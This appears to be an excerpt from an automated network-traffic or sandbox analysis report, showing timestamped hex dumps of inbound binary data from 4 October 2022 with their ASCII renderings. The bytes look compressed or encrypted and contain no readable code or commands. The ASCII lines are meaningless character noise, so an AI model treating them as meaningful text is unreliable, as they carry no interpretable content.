                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC3335INData Raw: fc 1d 3a d1 22 54 e6 4a 73 d7 46 d3 cd 71 be d0 b2 cd 0f 47 59 01 42 11 89 00 ab 27 d3 a2 14 92 2a cf be fa f8 90 32 1c 75 6f 02 7d ec cc 8a da ce 6b 88 a7 ba d6 2b 63 f8 c2 c9 55 1f ed aa 43 a5 c1 d6 ab 20 2f 7e 51 aa 21 cd ca d6 03 1d f0 ba c1 00 be 33 30 48 46 49 f0 63 9f cb fe 1c 02 3c a8 0c 41 5a c3 ab 2a 8f 95 77 77 b8 ba f0 33 b0 9b ab 5e 02 06 ae 46 62 66 d4 31 a7 af c1 ba 24 a6 f2 b0 61 bf 33 9c 95 61 82 df f4 a4 87 86 37 11 83 ab 6e b2 12 56 2e 76 7b 39 9e 3d 5f 6b f8 d3 08 46 0b 09 51 66 dd 72 2b fd 91 d3 d2 89 b2 ea ba 5b c5 43 9d 0d 9a 08 94 23 db 02 49 06 c0 fd ec 3a 1f e8 b0 4a c4 10 01 c0 96 86 a5 84 de 33 42 42 11 7c 38 88 d5 1b cd a9 f9 25 b0 d4 8b 59 b9 fe af f0 d2 9a c0 cb 36 dc 51 c0 70 58 a5 1a 12 5a a8 94 95 c5 53 07 84 fe 80 52 40
                                                                                                                                                                                                                                    Data Ascii: :"TJsFqGYB'*2uo}k+cUC /~Q!30HFIc<AZ*ww3^Fbf1$a3a7nV.v{9=_kFQfr+[C#I:J3BB|8%Y6QpXZSR@
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC3351INData Raw: 56 f0 a5 60 35 0c f8 2c ed 75 df 71 86 e4 c7 fd 85 5c f5 7d 72 d4 60 17 62 a6 c2 f4 c4 36 4d 16 4e 3f 17 1f 51 3f 67 a6 ec b5 b2 9d 46 9b 22 88 ce e5 0f 8a 30 6b 74 86 89 87 a1 7f 3f 97 1a ff 87 78 f4 4e 32 aa f8 f3 1b c9 71 e3 dc 05 72 2a dd 9b 8a 66 81 03 1a b3 ea a1 cd f9 94 4f f5 d3 6c c0 44 03 8b b6 59 09 7c e7 d0 bc 97 95 13 3d 92 22 64 2b 59 34 47 6f 93 d4 4f c1 5e 87 75 9e 7a 9a b1 88 95 b0 ec 79 36 49 52 61 d9 2c 22 68 c1 08 4c bb 34 a8 3a c9 98 24 de 48 eb cf b6 0a 3c 68 1f 47 dc 5e 19 4e 1e 01 66 10 d5 51 36 15 7a a1 66 f2 73 bc 7c 51 40 22 c1 5f b1 03 02 20 da 69 9e 1f cf 29 62 48 2e 62 76 37 20 1d 8e 28 ec 27 bf 34 d0 46 11 cd b8 ab b0 dc 31 98 56 5b 03 d3 a5 34 5d 72 ff c8 15 17 ac 1f b1 63 ef 6a 3c bd 9b b7 5c db fb a1 99 be 30 89 df 5c b4
                                                                                                                                                                                                                                    Data Ascii: V`5,uq\}r`b6MN?Q?gF"0kt?xN2qr*fOlDY|="d+Y4GoO^uzy6IRa,"hL4:$H<hG^NfQ6zfs|Q@"_ i)bH.bv7 ('4F1V[4]rcj<\0\
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC3367INData Raw: 87 7a f0 42 3d 56 30 32 44 d7 ad d6 a7 17 64 4a cb 51 ed ff f5 fe 75 12 2f 8c 10 c4 6a 6c 92 ae ac 76 d8 aa 77 86 9c 2f 78 21 5f aa 22 a3 cd 61 c4 64 8c 48 7f 4d 3e 6e 29 e6 ef 6f 8b 62 92 43 73 87 31 cd 00 02 1f 00 98 60 6e c9 b0 b0 2f 0d 26 5e 93 b5 cb 01 8f 6f 1c 51 2d 24 00 c6 64 67 e8 bf 93 ac 15 f1 7a c2 34 1b e0 3f 2b 09 6c 73 eb 44 be 47 8f 79 99 88 02 e4 7f ee ae e0 8f 46 0c bb fe ad 28 5f 5c 3d 28 23 6f a8 58 32 7c 50 38 1e 87 c3 92 67 63 66 c6 01 02 e7 5c 50 c8 cd 56 3d a5 48 33 ac 47 d3 16 ba d4 c6 af 55 2f b4 2f 0c a4 4a d0 b9 56 43 4e 13 78 48 a3 fd b4 0b 96 e4 ee bd fe aa fa 3c 44 8c 46 9e f5 1f 32 62 f9 81 61 9c ef e8 04 8e 5e 12 1f 55 0a f9 e4 18 2c be 43 00 61 f8 4f a3 ec cf ae ed 4e 52 84 3e 76 24 c6 50 33 e9 f3 3f c4 c6 27 d0 98 05 22
                                                                                                                                                                                                                                    Data Ascii: zB=V02DdJQu/jlvw/x!_"adHM>n)obCs1`n/&^oQ-$dgz4?+lsDGyF(_\=(#oX2|P8gcf\PV=H3GU//JVCNxH<DF2ba^U,CaONR>v$P3?'"
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC3383INData Raw: c2 29 f4 ac b4 e1 a5 0d ed d2 98 d0 ac e5 67 fd 1e 54 d7 db 84 5d 20 e4 db ad ba af e3 3d 39 6c ef 08 8c 39 d2 29 e5 24 a8 40 b8 c0 d9 50 c8 12 5a 84 48 61 d4 84 21 35 bc 25 3c 68 4e 81 59 9e 95 f8 5b b4 a1 25 31 17 29 f8 56 a7 8e 2d ff e3 b5 fc 36 ad 01 fd c0 60 38 6e cd 7d 00 61 dc f9 c0 44 17 68 f8 ff bc 3f 39 1b 22 e4 84 e1 ef e8 67 fa 11 9c ad 91 db 21 87 ff b0 29 26 01 5d c7 ca b2 01 eb 24 7e 2a 90 19 26 31 88 fc 2a ba 94 e1 9f 33 d7 e9 a5 05 f8 69 ee 55 8e 6f cf 8f 21 f5 d8 df 4f 9e f3 5c 18 7c 54 80 d6 ae 4b fc c6 2d 01 e9 cd 5c 9c 0b 14 2d 6e bc fc 05 34 42 6f 36 a2 84 e9 8b eb 93 bc 9a 82 57 f2 e9 07 4f e2 b1 56 92 a6 c6 50 dc 4b 76 82 03 97 48 c4 58 54 59 b2 3d c5 93 9e 85 30 77 e4 72 34 6f a1 0c 48 48 39 0f 6f 78 89 0c 1b 21 3b 5e 80 6f 06 f7
                                                                                                                                                                                                                                    Data Ascii: )gT] =9l9)$@PZHa!5%<hNY[%1)V-6`8n}aDh?9"g!)&]$~*&1*3iUo!O\|TK-\-n4Bo6WOVPKvHXTY=0wr4oHH9ox!;^o
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC3399INData Raw: 2e 7b a8 7d 8a b9 a1 27 49 a5 56 fc 9b 2e 50 76 1d 5b de 64 5d a4 8f fc 5b 2b 79 50 dc 03 08 c7 f2 1a 08 39 42 5e 48 ba c2 52 09 e9 f8 ee 21 95 4a 51 67 4e bb 9f a0 20 37 21 99 08 c2 68 bd 53 79 70 66 80 f9 6b 8f 45 f3 40 bd 67 ed 50 48 1e 6d d8 e0 87 80 74 03 72 05 96 0e 80 df 24 48 d7 c5 b4 7b d1 24 6b 23 6a 14 dc ce 28 54 07 35 9a a4 94 cb 15 71 01 67 48 99 18 3f 42 e3 0a ea 40 46 89 45 4c a9 57 c4 c1 5b 0d 7d ea 7b 19 b3 35 dc 20 72 24 c0 87 43 1d a7 22 21 ff bd a1 1f 0c b7 cd f3 79 8b ae c8 f2 79 21 86 91 5d 25 da f9 2f 65 55 63 52 be 4b 0f 94 8c ff 87 4e d5 2c 1a 2e 43 a2 fc 00 27 b6 a7 72 36 46 6b ae 72 32 cf e2 dd 57 d2 9a 54 de d3 75 75 e2 a8 ec 15 78 95 0d 74 b1 56 2e 6c d9 12 da 11 4b 2e 3b a2 04 8f 01 33 8a d0 2a ee 55 9e 8d 4f a1 19 40 01 37
                                                                                                                                                                                                                                    Data Ascii: .{}'IV.Pv[d][+yP9B^HR!JQgN 7!hSypfkE@gPHmtr$H{$k#j(T5qgH?B@FELW[}{5 r$C"!yy!]%/eUcRKN,.C'r6Fkr2WTuuxtV.lK.;3*UO@7
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC3415INData Raw: ab 95 97 93 84 e3 51 ee 30 83 3e 6f 83 dd e7 4b 83 67 50 73 f1 58 7e 2e 00 6c 47 43 25 f0 56 94 3e e4 0d 2e 13 75 ac d3 0a cb 0f df 02 fa 3c c7 f2 d0 4f 7c 46 c4 8e 97 6a ce 79 d2 ca 2e 20 72 bb 26 e3 87 8a 48 d6 4d b2 cd 5f 22 4b d5 9e 56 c9 b2 97 be 67 ad 31 f5 74 e2 63 a2 9b 82 a9 0a e3 a7 f4 1d b3 6e 53 4c 46 ae e1 3c f8 88 e0 df be b0 03 cf 24 99 dc 07 13 1f ab 9a 8c 45 38 61 f8 70 32 9d 08 b2 74 da ab ac 33 20 c5 d1 06 bf e4 e1 33 e0 3e 5e 8f 07 06 09 8c 4c 55 ce 84 cd 1b a3 87 9b fe 31 29 78 fa 91 e2 a8 a9 31 fd c5 35 74 01 50 e3 7c 40 14 48 42 56 9c 3a d4 14 8f 53 a0 32 84 46 73 4e d5 ca 2d 49 ca a3 6f c3 e1 1d 3e e8 67 1b 59 81 f5 34 15 39 28 6f f4 5d db ea 5d 17 10 f4 86 f5 f4 fa 05 90 b0 a6 6f 36 9e 86 7b f7 b2 45 88 20 c6 a6 b2 12 3e 47 36 06
                                                                                                                                                                                                                                    Data Ascii: Q0>oKgPsX~.lGC%V>.u<O|Fjy. r&HM_"KVg1tcnSLF<$E8ap2t3 3>^LU1)x15tP|@HBV:S2FsN-Io>gY49(o]]o6{E >G6
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC3431INData Raw: 97 5e 53 d4 df 0b 23 31 10 cd ea ee 12 30 ca 07 29 51 4b 72 dc 51 f8 54 21 b3 19 54 f2 4e 4a d9 da 0d 50 09 74 00 fc 41 49 e2 e7 55 24 67 f9 a7 29 6d 4e 50 c6 d4 3c 50 1c b9 af 72 cc 9d 6a a8 81 99 6a b8 d7 53 01 30 d1 63 7f bb 70 8e 22 4e e0 77 30 86 8c a8 d1 57 a7 57 24 da 90 c9 e1 17 63 a0 0f f4 e8 0c 5d 03 b2 a4 45 c5 e8 fc 76 3e a3 11 9f 9e 80 fd 7c bb c9 4d 52 61 24 19 14 95 33 27 41 14 58 07 a4 4e d0 f1 29 0d b1 ee cc 08 e6 c5 e3 67 dd 63 95 65 40 68 05 d5 7f 75 5d 15 cd c0 16 8d b4 c3 c1 be 60 20 07 19 41 39 a9 ae 2f 2f 88 61 81 c9 43 23 3b be cf fc b6 8e 67 41 9f 1a c8 c1 6c d4 f5 e5 d6 d7 7d 37 1e 24 72 00 fb fb e7 48 06 db fb 0c 5f 5d 03 e6 3d fa c8 1a be 4e 46 05 e0 8b 5b 69 20 64 3a 42 5f 4c 8d df 7b b6 e2 d7 d0 01 ad c5 ed a0 5c 75 e1 47 8e
                                                                                                                                                                                                                                    Data Ascii: ^S#10)QKrQT!TNJPtAIU$g)mNP<PrjjS0cp"Nw0WW$c]Ev>|MRa$3'AXN)gce@hu]` A9//aC#;gAl}7$rH_]=NF[i d:B_L{\uG
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC3447INData Raw: 30 8d 9f f9 5c 76 50 76 38 5b f6 ca ae 7a 13 fc e4 15 4d 1e 19 df 12 81 9b 26 ee 45 03 aa b6 66 66 71 2e 88 71 78 72 7d f1 35 a7 88 1d b3 54 c0 9f 40 de f9 ae f2 15 7c 56 58 c2 7f 4c 2f 40 3e e0 55 b1 4a 6b eb b6 a9 87 a9 3f f6 5f 93 b7 c6 55 dc 8f 05 c5 e4 aa 53 8e 6c 1f 8e 5a 66 6f 06 91 dd ca 73 15 cc 84 3d 40 3c 22 0d 2e eb 6a cb 0c 97 c5 bd b2 9b 47 9f f9 4e c9 b5 0d e3 18 5e d3 10 0e 40 dd 43 43 e6 47 20 1b cf d7 5c 1b c3 59 9b 87 52 e7 eb d3 97 ff f3 00 e3 ca 85 ad 4e ff 47 8f 04 0d e2 2e 8f 5f 9c 49 48 7b b8 72 6d 56 1a ef f9 80 19 1c fe 0d 12 4d aa f6 2a c2 b9 06 bd bb 3b 31 5d 86 6e a0 14 ac 8a 7c 4f 97 b0 8d e0 00 c6 b2 3b 63 02 87 10 38 df 17 38 55 7c 43 70 bc ca da fe 58 43 0c 9a fa f6 6c 12 4b fa 9f 7a 34 de 15 c9 c0 9c 19 b8 a8 63 87 cd e0
                                                                                                                                                                                                                                    Data Ascii: 0\vPv8[zM&Effq.qxr}5T@|VXL/@>UJk?_USlZfos=@<".jGN^@CCG \YRNG._IH{rmVM*;1]n|O;c88U|CpXClKz4c
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC3463INData Raw: 1e 59 3c 93 bd 91 bb 6b 08 34 49 57 5d ec af 3a 90 f0 90 07 10 87 00 24 45 56 e3 40 b5 46 c9 9d 3e 4f a8 03 f2 66 80 d7 84 13 a3 ed a2 51 cb 54 05 8c 82 f9 4f 24 78 60 8b 0b 11 ac 40 52 99 fe 73 5d 04 24 5d 7e df 48 9c cb 4f 83 df de bd e8 ba 25 ea 4e ea ad 15 8d 40 b9 ea e2 bc b6 fb 81 47 1b ad db 83 c5 05 88 7b 8c 95 e5 c3 24 f3 91 00 91 f4 10 ee 9c 2f c8 fb 31 7e 90 b7 2f 9c 6e 79 13 e2 76 46 f8 4e 95 ac 28 7b be ea 1a b9 87 3d 8f 2a 0e 58 87 18 68 8c 16 c5 97 20 a6 23 4d d1 57 cf bf a1 6e 2c f2 51 96 03 dc e6 7a 23 31 99 39 e7 51 1a 10 15 07 e9 11 fe 08 45 63 92 f9 d0 51 59 ef b4 7c 41 e9 f4 20 9a e1 6a 8f e1 f3 84 9d a3 c3 4d 54 a5 f0 ca f2 8f 05 3a 5d d3 2e 15 31 a4 e7 00 05 b4 ca 55 71 12 f9 5a 0b 9c e1 4e a8 07 3b 34 75 c4 8f a8 fe d7 d2 7e cc 39
                                                                                                                                                                                                                                    Data Ascii: Y<k4IW]:$EV@F>OfQTO$x`@Rs]$]~HO%N@G{$/1~/nyvFN({=*Xh #MWn,Qz#19QEcQY|A jMT:].1UqZN;4u~9
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC3479INData Raw: 25 d6 5e e2 72 8c 96 45 21 cf 29 f1 e4 10 3a d1 8c 73 38 30 02 12 56 ee 84 91 b4 b8 7a 83 17 1f 23 b3 c7 d1 d9 36 06 d7 00 5d 5b 04 47 dc 78 e9 4c 1e ec ec b7 93 f9 39 64 b5 e9 aa 06 1a 10 14 51 56 be 29 b9 14 ee f7 4c 50 1b fa ed 29 bf f5 48 2d c0 cc da 4c c0 f1 15 65 3d 77 00 0f e3 31 e8 22 5d 08 e8 0d 58 1f cc 1b 4c c3 b7 71 77 95 6a 68 ea 71 81 5f 79 2d 51 5a 48 7d b2 b4 e1 43 42 1c d8 6a a5 0f d7 ee 3e 64 58 6c e6 15 e9 2d 14 2c 21 63 38 1c e1 5c 8b ea 9e c3 c9 64 06 4e 6d fe 31 81 6f da ea 17 31 35 2d ef 5e 08 11 67 72 fc 3b c9 ab af f2 f6 cc 87 58 3c 9a 46 79 35 f9 d5 80 be d9 bc b7 5f 24 00 5c 20 45 62 75 55 ad 19 29 cb 76 73 12 95 fb 0d 1a 67 5c 7d 1e 8e 2d 2e 0b bf e0 c3 d2 26 4a 89 62 43 07 e8 77 7a 2a 1f 5b 81 43 3e 4d d1 04 1c 04 1d a5 fe 24
                                                                                                                                                                                                                                    Data Ascii: %^rE!):s80Vz#6][GxL9dQV)LP)H-Le=w1"]XLqwjhq_y-QZH}CBj>dXl-,!c8\dNm1o15-^gr;X<Fy5_$\ EbuU)vsg\}-.&JbCwz*[C>M$
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC3495INData Raw: 1b 29 37 0c d6 ac 74 d2 56 77 aa ce 6e 58 52 40 df ac 01 be 51 b4 04 ac 84 99 86 40 c2 62 fa 4f a4 af ce 43 91 ee e8 fe ef 95 70 30 a6 5d 36 7c 8c f7 49 58 c2 2a ba f7 77 38 31 9c 97 97 a1 5b 6a da 10 5b c5 08 6a 26 68 ff 3e 90 3e a7 ab f2 86 40 6e 1b cf 28 7f 0f 5b aa 9d 25 38 69 43 56 67 ed ad 06 56 80 9c 0e 6a e5 df 57 03 14 be 6a ac 65 1a 0c 31 35 fe 0c 55 7a 68 95 63 31 03 84 ae 9d 32 b0 6b 35 b2 1e 4d e3 b4 e5 64 23 c3 06 c5 64 bc cc 37 db f9 95 a8 29 b3 c8 dd cc f6 cc 19 78 dc 2f ff 89 89 d2 7b 26 76 90 74 5b e9 a6 ad be 81 83 10 e4 d9 65 05 53 04 37 13 d0 f2 a8 5b 3c 6c fc 26 b1 3a 7e cd 61 c7 6a 52 df 3b c2 c9 a7 b9 5a 3c b9 5b a2 62 fa ea 9e 02 20 af c6 ee 9c 46 e5 50 9d 63 0b 3c 07 b6 88 18 2c f1 6f 09 99 44 92 c7 2b 92 1e eb 04 cf 2d 90 97 55
                                                                                                                                                                                                                                    Data Ascii: )7tVwnXR@Q@bOCp0]6|IX*w81[j[j&h>>@n([%8iCVgVjWje15Uzhc12k5Md#d7)x/{&vt[eS7[<l&:~ajR;Z<[b FPc<,oD+-U
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC3511INData Raw: 3f d0 4b 4f 9b 57 55 3f f6 16 08 f2 77 71 a2 28 59 40 7d 8b 3d 37 bf 12 33 1a 0f fd c4 f3 a4 e9 2c 8b 26 8a 1a 8d 92 99 df e2 8d 51 7b 46 30 16 91 d2 52 0a d7 5b 7b d1 ca 5d 49 5e c1 3f 69 8c 94 4b 2c 7d a2 7b f2 d1 b4 95 d5 a6 b7 68 70 d7 91 d4 ee e0 9f 01 02 7e 47 96 c6 84 17 36 a9 fc f1 1c c6 42 e4 8e b3 c6 da de de ca 61 f5 cf 64 0c 29 fb 49 bb 33 e8 b2 a3 a5 a8 d5 ec 71 15 e0 72 36 96 b3 44 c9 e7 8d 74 ee 06 e1 86 17 98 7c 3e b8 35 df 4d ba c5 cb ed 89 7b ed bc d3 8c bd c2 33 b2 57 0b 8f d1 1f 46 ca b8 3c 9c 59 09 a6 65 82 2f c4 a7 cd 39 05 9f ac 39 9f 15 d3 84 b3 96 8a 6a 0d 35 6b de ce e4 fb 4d c2 d5 dc 39 f7 cc 59 62 4a ad 03 23 76 e6 f6 80 8e 28 19 52 9f 21 91 b5 fa 57 e8 4c 49 37 78 88 e2 de b8 52 60 21 02 8b 50 ed 91 34 a5 0a 1e 1d 15 c5 d6 11
                                                                                                                                                                                                                                    Data Ascii: ?KOWU?wq(Y@}=73,&Q{F0R[{]I^?iK,}{hp~G6Bad)I3qr6Dt|>5M{3WF<Ye/99j5kM9YbJ#v(R!WLI7xR`!P4
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC3527INData Raw: 03 11 10 a5 e2 6f 74 cd c4 44 8c 49 a6 ec 52 0d da 28 2e 35 cc e7 c0 d9 45 db e6 c4 b4 9a f5 31 a2 28 69 d1 32 83 04 17 df 77 c3 fc e3 53 34 78 82 89 4e de a3 fc 06 0d 35 51 7c 4e 70 a2 ba 06 32 c2 19 6a 38 6c 9a 26 90 8b f6 65 ba 3e ea 52 65 1d 5a dc d7 09 a3 3e cb 2c 9c b6 dd 5a 02 41 5e 27 25 ef 05 1d ab 54 61 c4 74 57 e6 6f b4 3b dd 9d f3 0f 62 b6 f0 a1 51 34 a8 3a ce 97 07 e7 32 62 c3 d1 b8 a4 df 8f bb ff 4a da 5d f4 a2 fa 46 41 fd 02 68 a1 d3 92 9b a2 38 22 20 19 7f af 1c 5a 19 ff 48 a7 d0 a7 ed 47 38 aa 65 83 ed 24 35 39 e8 39 fe e2 74 ba d2 4f df 6b 31 3f 77 28 5d 42 ab 3d a1 e1 c1 3b 38 01 58 17 a2 ff d4 18 f2 da 23 2f 4c b6 93 b3 95 56 fc 3a b5 70 bc 5e 42 0e 20 fb 74 34 91 db a4 05 1b b6 2b e1 16 34 8c af 58 91 41 31 77 d5 1f bd c7 e2 89 d4 4b
                                                                                                                                                                                                                                    Data Ascii: otDIR(.5E1(i2wS4xN5Q|Np2j8l&e>ReZ>,ZA^'%TatWo;bQ4:2bJ]FAh8" ZHG8e$599tOk1?w(]B=;8X#/LV:p^B t4+4XA1wK
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC3543INData Raw: 8e 3a 3b ea 57 c6 5d 59 96 8c 7b 2c ef fc 09 94 fa 8a 25 91 57 22 5f 58 00 3a 7f 4b 08 86 e9 2e a5 fc 03 c0 7d 3b 2a 8c b1 65 ed aa 93 1f 9e 4c 2b 88 11 f3 ae 6a a5 16 d4 61 73 3c 6d eb 6f 05 06 fa 91 75 31 7b 5a e4 cd 91 0e c0 1a ba 43 bd 08 47 47 12 a4 c9 4b 4d 6f 29 74 4f 3b 79 72 79 11 c6 33 ca 87 2a 47 13 c3 22 5a b9 b5 c4 fe 27 b2 25 a5 b6 40 ae be 64 62 2e a1 ee fe da bc be c1 88 67 d3 b4 10 6a ca b2 ec 6d cf 56 ec b5 fb cc 69 6d 2a 0a 77 c7 7e b2 86 4c 49 c3 42 b1 32 14 fe b1 b3 82 0c cc c9 0e 3d b0 20 5e ae f2 84 4e ab a8 be cc 3c 68 6e 66 88 e1 31 02 97 bf 45 8d 34 a7 cd 52 4a a2 9d 18 c7 5d 96 aa 39 4f 50 d9 de 4d e8 a4 66 02 ae b5 48 eb db 4d 3d 77 6d b2 0a 86 7e 91 9f 0a 22 56 8a ff 89 a7 41 5d 27 52 52 1a c1 3b ea 71 95 b8 fc be 57 54 ef 1e
                                                                                                                                                                                                                                    Data Ascii: :;W]Y{,%W"_X:K.};*eL+jas<mou1{ZCGGKMo)tO;yry3*G"Z'%@db.gjmVim*w~LIB2= ^N<hnf1E4RJ]9OPMfHM=wm~"VA]'RR;qWT
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC3559INData Raw: f5 85 93 22 48 54 ae 43 e7 79 75 c3 2f f7 5b 64 00 91 2b 29 2c ec 07 54 35 47 d2 9a 46 9e 80 16 28 54 31 a3 ba 7a 84 e7 64 d0 07 a3 f3 8a 03 2a c6 29 7e 6b f6 85 60 26 db 43 f1 76 39 fa 71 a4 3f ba 7a 29 2e 76 87 91 82 9c b2 bf 2d d2 a1 f4 58 d0 19 18 60 51 40 9a 89 a2 51 f2 84 c7 5a b9 b9 88 60 df ca 2f 1c 5c 3d 3b 5d a9 78 4d 41 ff 9f ba a4 3b 6b b0 7d 7b 70 b1 d0 53 22 c5 89 8d 4c 5a 9a 39 ef c3 83 3f 37 08 a7 9e 85 90 ab d9 3d 4f cc c6 a8 3e 0b 1e 45 6c a5 0a 82 50 d2 71 3e 68 e2 66 82 58 79 14 e2 3f 75 0c c8 8d bd 6f 33 9b f5 36 79 45 af 80 5a 87 bf 3f 66 8b 7a 1e f8 16 59 8b 02 93 02 f0 6e 7c 59 c0 b7 1d d1 d9 04 ce ac c7 dc 7d eb ac a9 3d 73 47 a5 d3 4a 3f 89 fd ae 1e 7b b3 24 a6 6a 3f 62 f1 5d d9 8a 1f b6 ee 7a 6d 31 5a 72 c7 17 c0 7a be 61 4c f9
                                                                                                                                                                                                                                    Data Ascii: "HTCyu/[d+),T5GF(T1zd*)~k`&Cv9q?z).v-X`Q@QZ`/\=;]xMA;k}{pS"LZ9?7=O>ElPq>hfXy?uo36yEZ?fzYn|Y}=sGJ?{$j?b]zm1ZrzaL
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC3575INData Raw: f6 98 5b 91 e6 9a 8e af ee 4a 1c fa a1 1a 32 53 36 53 31 32 e3 ac eb 41 66 8f cd 81 18 c2 b8 99 10 8d e8 fc f6 38 ab 6a 64 6e c4 bd 6e 36 f8 74 07 93 fb bf fe fb 93 6e b3 07 7d 79 2f d2 d5 60 2f 26 3a 61 03 8f 9d ac 9c 2a 9b a9 d1 a5 0d 79 eb a5 3c 19 aa 45 0c 76 6c 84 86 41 6d 27 aa e0 c7 f7 2a 4d bb 31 79 78 91 06 b6 8c d8 ce ac 2a 72 08 8e 39 96 26 6a 2d bd 8e 6e b4 6a 3e 55 db 01 41 ae d2 fc 03 a3 36 ae e0 f6 67 1b 15 75 00 3e 0c 01 66 35 88 65 59 6b 27 03 25 9b af c9 b5 25 5a 56 2e 5d eb 53 98 55 c3 80 61 8c 24 84 36 ef aa a4 d8 8e 49 dc dc d9 ac 32 84 a8 32 f2 3a 6d 7b b3 3d d5 08 64 95 4c 13 2a 88 f2 fe af 7d 54 a6 55 ed 34 3a 1f 07 29 f2 82 d5 1b 7c 11 14 fc 20 f6 ae a2 ad 17 16 87 9e fe cf 60 c4 28 25 4b ac 0b e8 c8 d7 2b 38 ac 3a a2 6d ae f3 24
                                                                                                                                                                                                                                    Data Ascii: [J2S6S12Af8jdnn6tn}y/`/&:a*y<EvlAm'*M1yx*r9&j-nj>UA6gu>f5eYk'%%ZV.]SUa$6I22:m{=dL*}TU4:)| `(%K+8:m$
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC3591INData Raw: 8d 16 b0 64 32 d4 72 7e c8 00 6a fe 5f aa 9e 0d 2c 09 30 06 54 7e 8f a8 ec 81 31 6b 25 ea bd bd ea 11 30 f0 36 b1 8b 8e 7c ba da 8e 39 8d 2b 57 b5 a3 3f 1c 27 10 10 71 2b 72 88 45 50 0b fd e9 81 93 c5 1a 5a 40 1d f1 65 c0 4c e8 5b 46 9f 22 6e 1d 9f aa 4d 21 17 be 3e bc 31 97 5c 77 57 5f d7 a9 c9 f9 bc 7a 4b 1d 27 c2 7e a0 63 db a6 98 28 0f 2f 07 1d 29 d3 fe 84 76 b5 d9 c0 d9 ba 83 fe 1d 2b ac 94 ad 4d 6c a1 c3 1b 16 e8 da 11 69 c1 1c 65 a3 5f 9e b0 bf f4 13 b9 ec 07 67 bd dc b5 b9 af 37 20 62 a7 07 25 65 0f 53 d5 69 a2 d9 df c7 87 4c 94 ea 3d c7 df 6f b4 85 55 24 ad 49 f9 96 fb 3b 93 c2 ae c6 8d 1a 06 05 7d bc f0 31 36 9f 6b 81 e6 c8 04 52 a5 53 11 2f 79 a1 6a d1 8e 16 58 eb 9d 91 34 c7 39 59 71 da fe 42 17 ab 14 c3 47 95 c2 bf 23 cf ba 68 e5 9c 1c 55 8c
                                                                                                                                                                                                                                    Data Ascii: d2r~j_,0T~1k%06|9+W?'q+rEPZ@eL[F"nM!>1\wW_zK'~c(/)v+Mlie_g7 b%eSiL=oU$I;}16kRS/yjX49YqBG#hU
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC3607INData Raw: f6 98 40 26 86 19 b1 de 48 b1 c3 bc 36 aa 63 53 02 a3 6f a0 17 42 e8 21 f1 80 5f 66 09 08 68 4c 4e 7b ba 42 0d ee 7d 6b 9c d5 44 a1 d0 16 bf a6 20 76 8d b1 07 a8 1c ae 9a 3a 4d 0c 18 87 d8 68 be 3a fa d5 1e 08 93 65 4b 3f 1a 72 f2 e7 91 04 69 f5 1b 1f 34 ac 2d 3e 23 48 56 a8 0d 07 5b bd d8 23 69 7d 80 98 78 b6 a2 60 03 aa 49 d6 4b 5e c3 42 b1 6c 06 c2 49 d0 ee 61 3b 11 6e b9 22 b0 83 3b 97 b8 fc 8e 73 43 41 e4 1c 50 34 8e ec 18 2a e1 c2 b3 e5 4f e8 1a f8 bb 15 2d 73 58 42 02 89 c8 d7 87 5c 39 f6 e7 7c 0f 46 21 a1 86 38 d1 b3 92 dc 0d e2 22 67 28 50 34 43 f6 d2 6e 9f 52 9c 2c 4e b3 b8 df b9 46 b1 8a 4a 6d 06 6a 8b 0c 16 ac 32 54 c6 64 ff 6b 72 eb 6c 3a 33 4c 6f dd 71 8d 3a dc 9b e1 d7 2c 0b 6f 0e b6 52 5f 0c b7 f2 df 11 f0 f6 c7 28 48 bb d9 df 4a 6a 18 4a
                                                                                                                                                                                                                                    Data Ascii: @&H6cSoB!_fhLN{B}kD v:Mh:eK?ri4->#HV[#i}x`IK^BlIa;n";sCAP4*O-sXB\9|F!8"g(P4CnR,NFJmj2Tdkrl:3Loq:,oR_(HJjJ
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC3623INData Raw: 45 5b df 3e b5 59 de 89 f8 67 ca f3 1a 1d 0d 51 ef c3 45 ec e7 d7 e7 59 df 1e f9 79 5e eb 6d 9e 44 e4 18 75 70 b8 f4 a5 0f fb d1 0f 22 5b e9 7b 27 05 d6 fb ba df af 05 25 b7 20 f3 ee d9 8f 45 c2 69 82 97 5f 47 fb 5d 68 44 f0 7f cc 5d c7 a0 c2 4d f5 01 41 c0 0c 76 04 66 9b 41 2c ec 68 f2 01 e2 df ae 21 ed 6a be 0c 18 f9 dd 9a 85 13 a9 f2 9d 1e e9 e3 d4 e5 77 00 01 b3 f8 57 7a 01 f9 ea b2 b1 aa 2c 0d bf 78 36 0c 7b 0c 6d 9d db 4d 8e bd 94 d7 d4 11 d5 26 53 ae 80 b1 7d 59 c4 c1 20 6c c0 66 d2 fe b1 45 a3 d5 f8 06 ac ba 08 22 c2 26 ca 05 bc 1a c8 50 56 a2 2d 21 a7 94 cc df fd bc db 37 4b 31 7e 7b 99 81 3a 11 e5 b0 4d a8 0b ad 41 fa ad 3c dc 2e b0 8e e9 31 83 67 4f 99 e1 f4 e6 54 80 23 11 1b 8d 06 f3 d6 5a 3e 1d 73 2f af 13 10 48 56 3b 47 40 a7 ac 38 81 b3 b8
                                                                                                                                                                                                                                    Data Ascii: E[>YgQEYy^mDup"[{'% Ei_G]hD]MAvfA,h!jwWz,x6{mM&S}Y lfE"&PV-!7K1~{:MA<.1gOT#Z>s/HV;G@8
